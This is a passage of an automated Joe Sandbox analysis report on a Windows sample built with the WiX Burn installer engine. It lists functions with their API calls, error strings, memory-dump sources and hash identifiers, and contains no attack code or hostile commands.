                                                                                                                                                                  • Opcode Fuzzy Hash: c605d6a620918635b663eed762860f0adab9c65e15ceb14f21dc3affd011196d
                                                                                                                                                                  • Instruction Fuzzy Hash: 6F018F32500216EFDB109F65EC8965EFBB8FF84305F108979E41AE3161EB70E990DB50
                                                                                                                                                                  Function 0097050F Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 009701DE: VariantInit.OLEAUT32(?), ref: 009701F5
                                                                                                                                                                    • Part of subcall function 009701DE: VariantClear.OLEAUT32(?), ref: 00970340
                                                                                                                                                                    • Part of subcall function 009701DE: SysFreeString.OLEAUT32(00000000), ref: 0097034B
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,yes,000000FF,00917D9B,?,00000000,00000000,?,?,0091BB5B,00917D9B,Hidden,?), ref: 00970563
                                                                                                                                                                  Strings
                                                                                                                                                                  • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp, xrefs: 00970544
                                                                                                                                                                  • Failed to get attribute., xrefs: 00970535
                                                                                                                                                                  • yes, xrefs: 00970555
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: StringVariant$ClearCompareFreeInit
                                                                                                                                                                  • String ID: Failed to get attribute.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp$yes
                                                                                                                                                                  • API String ID: 2896382772-315762043
                                                                                                                                                                  • Opcode ID: c9f88de32bb96ea36ad631e73e0594b658375acd72b083775aae004bf2874b16
                                                                                                                                                                  • Instruction ID: d7dae8b849578be6a47781d1293302dd1489708a341e5f13f9508e6f9374d253
                                                                                                                                                                  • Opcode Fuzzy Hash: c9f88de32bb96ea36ad631e73e0594b658375acd72b083775aae004bf2874b16
                                                                                                                                                                  • Instruction Fuzzy Hash: 3F014E32A84228FBCF10AAA4CC0BFDE7A64DB81764F10C310B918B61D0C6704B00DB90
                                                                                                                                                                  Function 00919720 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetCurrentProcess.KERNEL32(?,00000000), ref: 00919730
                                                                                                                                                                    • Part of subcall function 0096BCAF: LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 0096BCD0
                                                                                                                                                                    • Part of subcall function 0096BCAF: GetLastError.KERNEL32 ref: 0096BCDA
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to set variant value., xrefs: 0091977A
                                                                                                                                                                  • Failed to check if process token has privilege: %ls., xrefs: 00919745
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\variable.cpp, xrefs: 00919757, 0091978C
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CurrentErrorLastLookupPrivilegeProcessValue
                                                                                                                                                                  • String ID: Failed to check if process token has privilege: %ls.$Failed to set variant value.$d:\a\wix4\wix4\src\burn\engine\variable.cpp
                                                                                                                                                                  • API String ID: 3865200005-2747678004
                                                                                                                                                                  • Opcode ID: 03e80bdedd2b5d59e18ded357d64bfe7953837dff225ebb32ff1b6c50b2c927e
                                                                                                                                                                  • Instruction ID: 06adb8729ca8d9dd07be8242d20f1da44baeb3e54b77955fcd738cedeffe4688
                                                                                                                                                                  • Opcode Fuzzy Hash: 03e80bdedd2b5d59e18ded357d64bfe7953837dff225ebb32ff1b6c50b2c927e
                                                                                                                                                                  • Instruction Fuzzy Hash: 46F0C872B80218B7EB11BA54DC07FDE395CDF40BA4F004150FA44FA2C1EBB09A5057E0
                                                                                                                                                                  Function 00919430 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 43COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetCurrentProcess.KERNEL32(?), ref: 0091943F
                                                                                                                                                                    • Part of subcall function 0096BD94: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process2,?,?,?,?,0091944B,00000000), ref: 0096BDA7
                                                                                                                                                                    • Part of subcall function 0096BD94: GetProcAddress.KERNEL32(00000000), ref: 0096BDAE
                                                                                                                                                                    • Part of subcall function 0096BD94: GetLastError.KERNEL32(?,?,?,?,0091944B,00000000), ref: 0096BDD8
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to set variant value., xrefs: 0091947F
                                                                                                                                                                  • Failed to get native machine value., xrefs: 00919451
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\variable.cpp, xrefs: 00919491
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressCurrentErrorHandleLastModuleProcProcess
                                                                                                                                                                  • String ID: Failed to get native machine value.$Failed to set variant value.$d:\a\wix4\wix4\src\burn\engine\variable.cpp
                                                                                                                                                                  • API String ID: 896058289-3337725491
                                                                                                                                                                  • Opcode ID: 583520bdedca9b222402d4efc34a14ef206ff0bcf1d6505fd8ca7e5bdbb59d29
                                                                                                                                                                  • Instruction ID: 2a7166367dddf2c0000fbb312668825ec436ff7db0d490c591f02fa928845908
                                                                                                                                                                  • Opcode Fuzzy Hash: 583520bdedca9b222402d4efc34a14ef206ff0bcf1d6505fd8ca7e5bdbb59d29
                                                                                                                                                                  • Instruction Fuzzy Hash: ACF024B2F8133872DB22B6998C1AFDF665C8B85B50F000151B948FB2D1F6A4DD8087E1
                                                                                                                                                                  Function 009171A8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 009205D5: GetProcAddress.KERNEL32(00000000,BundleExtensionDestroy), ref: 00920603
                                                                                                                                                                    • Part of subcall function 009205D5: FreeLibrary.KERNEL32(00000000), ref: 0092061E
                                                                                                                                                                    • Part of subcall function 009205D5: GetLastError.KERNEL32 ref: 00920628
                                                                                                                                                                  • IsWindow.USER32(?), ref: 00917385
                                                                                                                                                                  • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00917398
                                                                                                                                                                  Strings
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\engine.cpp, xrefs: 00917131
                                                                                                                                                                  • Failed to create the message window., xrefs: 009171A8
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressErrorFreeLastLibraryMessagePostProcWindow
                                                                                                                                                                  • String ID: Failed to create the message window.$d:\a\wix4\wix4\src\burn\engine\engine.cpp
                                                                                                                                                                  • API String ID: 1565363025-1122250624
                                                                                                                                                                  • Opcode ID: 3d4e88d0309193c665ad6ab832a8fc7105dcf34ddb07da242efc574343cdf312
                                                                                                                                                                  • Instruction ID: 24bc83c237d4e2db07723d7b50c146719a2248dd60102e1edcefde72ad811d3f
                                                                                                                                                                  • Opcode Fuzzy Hash: 3d4e88d0309193c665ad6ab832a8fc7105dcf34ddb07da242efc574343cdf312
                                                                                                                                                                  • Instruction Fuzzy Hash: 52F0C231744609BADB1177A0EC4AFEEF678AB90701F104011F505A40A1D7B19AD5FA60
                                                                                                                                                                  Function 009171CB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 009205D5: GetProcAddress.KERNEL32(00000000,BundleExtensionDestroy), ref: 00920603
                                                                                                                                                                    • Part of subcall function 009205D5: FreeLibrary.KERNEL32(00000000), ref: 0092061E
                                                                                                                                                                    • Part of subcall function 009205D5: GetLastError.KERNEL32 ref: 00920628
                                                                                                                                                                  • IsWindow.USER32(?), ref: 00917385
                                                                                                                                                                  • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00917398
                                                                                                                                                                  Strings
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\engine.cpp, xrefs: 00917131
                                                                                                                                                                  • Failed to query registration., xrefs: 009171CB
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressErrorFreeLastLibraryMessagePostProcWindow
                                                                                                                                                                  • String ID: Failed to query registration.$d:\a\wix4\wix4\src\burn\engine\engine.cpp
                                                                                                                                                                  • API String ID: 1565363025-1827799990
                                                                                                                                                                  • Opcode ID: a4e10b978be32d49dac9a124e2079ef4de816f1067c4ed9e22ef9b761c14fc36
                                                                                                                                                                  • Instruction ID: 9b3e2ed761a1cfd7c762e49c99c6888f110c7daf5a070259c35e1702ad0606d2
                                                                                                                                                                  • Opcode Fuzzy Hash: a4e10b978be32d49dac9a124e2079ef4de816f1067c4ed9e22ef9b761c14fc36
                                                                                                                                                                  • Instruction Fuzzy Hash: 65F0C231744609BADB0177A0DC0BFEEF678AF90701F104011B905A40A1D7B18BD5FA60
                                                                                                                                                                  Function 0091716A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 009205D5: GetProcAddress.KERNEL32(00000000,BundleExtensionDestroy), ref: 00920603
                                                                                                                                                                    • Part of subcall function 009205D5: FreeLibrary.KERNEL32(00000000), ref: 0092061E
                                                                                                                                                                    • Part of subcall function 009205D5: GetLastError.KERNEL32 ref: 00920628
                                                                                                                                                                  • IsWindow.USER32(?), ref: 00917385
                                                                                                                                                                  • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00917398
                                                                                                                                                                  Strings
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\engine.cpp, xrefs: 00917131
                                                                                                                                                                  • Failed to check global conditions, xrefs: 0091716A
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressErrorFreeLastLibraryMessagePostProcWindow
                                                                                                                                                                  • String ID: Failed to check global conditions$d:\a\wix4\wix4\src\burn\engine\engine.cpp
                                                                                                                                                                  • API String ID: 1565363025-665746148
                                                                                                                                                                  • Opcode ID: 6d5e0922a739122e59c0f09396419970f29378ad10e38969d6f18582f8a37039
                                                                                                                                                                  • Instruction ID: 142a47125aa463b7e1e92aa0000f3e74352d97e33d5a78cca42839378c77a813
                                                                                                                                                                  • Opcode Fuzzy Hash: 6d5e0922a739122e59c0f09396419970f29378ad10e38969d6f18582f8a37039
                                                                                                                                                                  • Instruction Fuzzy Hash: 8EF0C231704209BADB0177A0DC4BFEEFA78AB90701F100011B905A40A2D7B58BD6FB60
                                                                                                                                                                  Function 0091711F Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 40windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 009205D5: GetProcAddress.KERNEL32(00000000,BundleExtensionDestroy), ref: 00920603
                                                                                                                                                                    • Part of subcall function 009205D5: FreeLibrary.KERNEL32(00000000), ref: 0092061E
                                                                                                                                                                    • Part of subcall function 009205D5: GetLastError.KERNEL32 ref: 00920628
                                                                                                                                                                  • IsWindow.USER32(?), ref: 00917385
                                                                                                                                                                  • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00917398
                                                                                                                                                                  Strings
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\engine.cpp, xrefs: 00917131
                                                                                                                                                                  • Failed to open log., xrefs: 0091711F
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressErrorFreeLastLibraryMessagePostProcWindow
                                                                                                                                                                  • String ID: Failed to open log.$d:\a\wix4\wix4\src\burn\engine\engine.cpp
                                                                                                                                                                  • API String ID: 1565363025-1747915094
                                                                                                                                                                  • Opcode ID: b3c365a4b7e3f58f5fc16f5dedb2c569cdd4b6ae80c37588ac3fa17e2f1e88f1
                                                                                                                                                                  • Instruction ID: 8c797804b7ecee0e961940df4518bb09ab5ebbe12b4f6d44a4bb0e115082106d
                                                                                                                                                                  • Opcode Fuzzy Hash: b3c365a4b7e3f58f5fc16f5dedb2c569cdd4b6ae80c37588ac3fa17e2f1e88f1
                                                                                                                                                                  • Instruction Fuzzy Hash: 5EF0C231740209BADB0177A0DC0AFEEB678AF94701F100011B505A40A1D7B19AD5EA60
                                                                                                                                                                  Function 00959AE3 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00959A94,00000000,?,009ACD30,?,?,?,00959C37,00000004,InitializeCriticalSectionEx,0099C2FC,InitializeCriticalSectionEx), ref: 00959AF0
                                                                                                                                                                  • GetLastError.KERNEL32(?,00959A94,00000000,?,009ACD30,?,?,?,00959C37,00000004,InitializeCriticalSectionEx,0099C2FC,InitializeCriticalSectionEx,00000000,?,009599B0), ref: 00959AFA
                                                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00959B22
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                  • String ID: api-ms-
                                                                                                                                                                  • API String ID: 3177248105-2084034818
                                                                                                                                                                  • Opcode ID: 532d2fbbd2796b196d5716b61d541c30d8885de0803e59967f39f2a97992240c
                                                                                                                                                                  • Instruction ID: d70af85e3fe10dfee4bf02fbd641a6134f14dc9e44ec7fb77792ddca7e604089
                                                                                                                                                                  • Opcode Fuzzy Hash: 532d2fbbd2796b196d5716b61d541c30d8885de0803e59967f39f2a97992240c
                                                                                                                                                                  • Instruction Fuzzy Hash: 38E01A71684205BAFF205B62FC06B193A5CEB14B52F104060FD0DA80E1F762E9559A45
                                                                                                                                                                  Function 009665B5 Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetConsoleOutputCP.KERNEL32(A68EAB5A,00000000,00000000,?), ref: 00966618
                                                                                                                                                                    • Part of subcall function 00961F7B: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0096628B,?,00000000,-00000008), ref: 00961FDC
                                                                                                                                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0096686A
                                                                                                                                                                  • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 009668B0
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00966953
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2112829910-0
                                                                                                                                                                  • Opcode ID: b7e0b05566395e30ccea3bf71897daa8ce450697f4d6382d7e4c75700d696bb9
                                                                                                                                                                  • Instruction ID: ce17dd722eb33c399e21e8b46d83449d97007bb0988d15ebd08c2ce6d6647c4f
                                                                                                                                                                  • Opcode Fuzzy Hash: b7e0b05566395e30ccea3bf71897daa8ce450697f4d6382d7e4c75700d696bb9
                                                                                                                                                                  • Instruction Fuzzy Hash: D3D1ACB5D042599FCF14CFA8D890AEDBBB8FF49314F24452AE866EB351D630A942CB50
                                                                                                                                                                  Function 0095A01A Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AdjustPointer
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1740715915-0
                                                                                                                                                                  • Opcode ID: e0b8613dd19c1875432bebe9256f0800c980e740ff27ec616e74323757f7c35c
                                                                                                                                                                  • Instruction ID: a70b02ecffa31bf8d6210207e698806fb3a01f433f1be0819e2ba1dfedcbb4a0
                                                                                                                                                                  • Opcode Fuzzy Hash: e0b8613dd19c1875432bebe9256f0800c980e740ff27ec616e74323757f7c35c
                                                                                                                                                                  • Instruction Fuzzy Hash: 1C5138726096029FDB28CF67D841BBAB7A9FF45312F10462DEC054B290E735DC48CB9A
                                                                                                                                                                  Function 0091C8CA Relevance: 6.1, APIs: 4, Instructions: 58COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000020,00000003,?,?,00000000), ref: 0091C932
                                                                                                                                                                  • VerSetConditionMask.KERNEL32(00000000,?,?,?,00000000), ref: 0091C93A
                                                                                                                                                                  • VerSetConditionMask.KERNEL32(00000000,?,?,?,?,00000000), ref: 0091C942
                                                                                                                                                                  • VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 0091C96F
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ConditionMask$InfoVerifyVersion
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2793162063-0
                                                                                                                                                                  • Opcode ID: a987249ca0f220ccc3a33ccf73a5be22fd77485f1917d65d2ebc2692f8ac2941
                                                                                                                                                                  • Instruction ID: 8e426618d9141f05abc69a7e74e9095caa97527aa14f534f4c58d9da857418b3
                                                                                                                                                                  • Opcode Fuzzy Hash: a987249ca0f220ccc3a33ccf73a5be22fd77485f1917d65d2ebc2692f8ac2941
                                                                                                                                                                  • Instruction Fuzzy Hash: 91111F71D1422CAADB24DF55DC06BEEBBB8EF08B00F00809AB509A6281D6B44B848FD4
                                                                                                                                                                  Function 0091B4F2 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 41COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • EnterCriticalSection.KERNEL32(7FFFFFFE,00000000,?,?,009185B0,00000000,?,0092A80F,?,00000001,00000000,?,00000002,-00000001,00000008,?), ref: 0091B4FE
                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(7FFFFFFE,7FFFFFFE,?,00000000,?,?,009185B0,00000000,?,0092A80F,?,00000001,00000000,?,00000002,-00000001), ref: 0091B55D
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to get visibility of variable: %ls, xrefs: 0091B52E
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\variable.cpp, xrefs: 0091B540
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CriticalSection$EnterLeave
